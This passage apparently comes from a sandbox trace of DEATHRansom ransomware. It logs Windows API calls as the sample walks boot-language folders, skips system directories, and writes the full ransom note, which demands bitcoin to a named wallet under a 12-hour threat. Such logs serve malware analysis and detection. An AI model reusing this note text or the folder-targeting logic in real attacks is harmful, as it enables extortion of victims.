ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0075.005] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0075.005] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0075.005] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0075.005] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0075.005] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0075.005] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0075.005] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0075.005] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0075.005] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.005] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\read_me.txt") returned 29 [0075.005] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\read_me.txt" (normalized: "c:\\boot\\fonts\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.007] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.007] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.007] CloseHandle (hObject=0x7a8) returned 1 [0075.008] GetProcessHeap () returned 0x4f10000 [0075.008] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 [0075.008] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0075.008] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0075.008] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0075.008] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0075.008] StrStrW (lpFirst="fr-fr", lpSrch="programdata") returned 0x0 [0075.008] StrStrW (lpFirst="fr-fr", lpSrch="$recycle.bin") returned 0x0 [0075.008] StrStrW (lpFirst="fr-fr", lpSrch="program files") returned 0x0 [0075.008] StrStrW (lpFirst="fr-fr", lpSrch="windows") returned 0x0 [0075.008] StrStrW (lpFirst="fr-fr", lpSrch="all users") returned 0x0 [0075.008] StrStrW (lpFirst="fr-fr", lpSrch="appdata") returned 0x0 [0075.008] GetProcessHeap () returned 0x4f10000 [0075.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.008] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\fr-FR" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR") returned="\\\\?\\C:\\Boot\\fr-FR" [0075.008] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 10 [0075.008] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.009] GetProcessHeap () returned 0x4f10000 [0075.010] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.010] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\*") returned 19 [0075.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.010] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\.") returned 19 [0075.010] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.010] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.010] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\..") returned 20 [0075.010] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.010] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.010] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0075.010] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.010] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.010] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\read_me.txt") returned 29 [0075.010] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\read_me.txt" (normalized: "c:\\boot\\fr-fr\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.011] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.011] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.011] CloseHandle (hObject=0x7a8) returned 1 [0075.012] GetProcessHeap () returned 0x4f10000 [0075.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.012] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0075.012] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0075.012] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0075.012] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0075.012] StrStrW (lpFirst="hu-hu", lpSrch="programdata") returned 0x0 [0075.012] StrStrW (lpFirst="hu-hu", lpSrch="$recycle.bin") returned 0x0 [0075.012] StrStrW (lpFirst="hu-hu", lpSrch="program files") returned 0x0 [0075.012] StrStrW (lpFirst="hu-hu", lpSrch="windows") returned 0x0 [0075.012] StrStrW (lpFirst="hu-hu", lpSrch="all users") returned 0x0 [0075.012] StrStrW (lpFirst="hu-hu", lpSrch="appdata") returned 0x0 [0075.012] GetProcessHeap () returned 0x4f10000 [0075.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.012] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\hu-HU" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU") returned="\\\\?\\C:\\Boot\\hu-HU" [0075.012] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 11 [0075.012] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.013] GetProcessHeap () returned 0x4f10000 [0075.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.013] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\*") returned 19 [0075.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.013] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\.") returned 19 [0075.013] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.013] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.013] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.014] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\..") returned 20 [0075.014] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.014] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.014] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0075.014] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.014] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.014] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\read_me.txt") returned 29 [0075.014] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\read_me.txt" (normalized: "c:\\boot\\hu-hu\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.014] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.014] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.015] CloseHandle (hObject=0x7a8) returned 1 [0075.015] GetProcessHeap () returned 0x4f10000 [0075.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.015] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0075.015] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0075.015] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0075.015] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0075.015] StrStrW (lpFirst="it-it", lpSrch="programdata") returned 0x0 [0075.015] StrStrW (lpFirst="it-it", lpSrch="$recycle.bin") returned 0x0 [0075.015] StrStrW (lpFirst="it-it", lpSrch="program files") returned 0x0 [0075.015] StrStrW (lpFirst="it-it", lpSrch="windows") returned 0x0 [0075.015] StrStrW (lpFirst="it-it", lpSrch="all users") returned 0x0 [0075.015] StrStrW (lpFirst="it-it", lpSrch="appdata") returned 0x0 [0075.015] GetProcessHeap () returned 0x4f10000 [0075.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.016] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\it-IT" | out: lpString1="\\\\?\\C:\\Boot\\it-IT") returned="\\\\?\\C:\\Boot\\it-IT" [0075.016] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 12 [0075.016] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.016] GetProcessHeap () returned 0x4f10000 [0075.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0075.016] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\*") returned 19 [0075.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.017] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\.") returned 19 [0075.017] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.017] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.017] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.017] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: 